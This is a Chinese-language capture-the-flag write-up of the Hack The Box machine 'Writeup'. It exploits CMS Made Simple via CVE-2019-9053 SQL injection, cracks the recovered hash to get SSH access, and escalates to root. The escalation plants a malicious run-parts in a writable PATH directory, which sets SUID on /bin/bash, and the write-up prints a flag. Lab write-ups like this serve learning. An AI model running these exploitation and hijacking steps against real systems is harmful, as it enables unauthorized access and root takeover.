HTB-Writeup
1 | ip='10.129.253.209' |
开了22和80

页面提示防DOS,随便几个请求就封了一会IP,显然不让爆破
提示vim,所以应该有vim的备份文件
Page is hand-crafted with vi.
试了.index.html. swp.index.html.swo和.index.html.swn都不行
robots.txt有文件


CMS Made Simple
网站为CMS Made Simple

有后台登录口
1 | http://10.129.253.209/writeup/admin/login.php |
2019年有个sql注入,CVE-2019-9053
跑了下结果为
1 | [+] Salt for password found: 5a599ef579066807 |
还得爆破一下
1 | echo '62def4866937f08cc13bab43bb14e6f7:5a599ef579066807' > hash |
密码为raykayjay9
逆天,后台怎么都登不上,结果是ssh连,有病吧

提权
1 | jkr@writeup:/tmp$ pkexec --version |
一键提权失败

staff组
1 | jkr@writeup:/tmp$ id |
这里的staff不是debian标准group
1 | # 看看系统里哪些文件属于 staff |
重点关注这两个目录,都是可写的
1 | jkr@writeup:/tmp$ ls -ld /usr/local/bin/ /usr/local/sbin/ |
接下来就是要找到在某个条件下会触发且带root权限以及和上述目录有关的程序
1 | https://github.com/DominicBreuker/pspy |
目前唯一能和系统交互的就只有ssh登录,所以在一个窗口启动pspy32,另起一个登录
这样就抓到了ssh具体登录过程所触发的命令

劫持
首先观察到,有权限的两个路径/usr/local/bin/和/usr/local/sbin/写入环境变量后,就执行了run-parts,且为root权限
1 | CMD: UID=0 PID=2576 | sh -c /usr/bin/env -i PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin run-parts --lsbsysinit /etc/update-motd.d > /run/motd.dynamic.new |
而搜索run-parts会发现默认路径在/bin/run-parts
1 | jkr@writeup:~$ which run-parts |
显然,只需要在/usr/local/bin/和/usr/local/sbin/这两个路径创建个run-parts,就可以让系统优先执行恶意命令形成劫持
放/usr/local/bin ssh看起来和平时差不多
1 | echo -e '#!/bin/bash\n\nchmod u+s /bin/bash' > /usr/local/sbin/run-parts; chmod +x /usr/local/sbin/run-parts |
重新登录ssh


d4fff36a1a25b65512c9d645dd3db25b
- 标题: HTB-Writeup
- 作者: metafa1ica
- 创建于 : 2025-08-02 17:24:39
- 更新于 : 2025-08-17 13:29:28
- 链接: https://metafa1ica.github.io/post/d9ab780b6d17/
- 版权声明: 本文章采用 CC BY-NC-SA 4.0 进行许可。
评论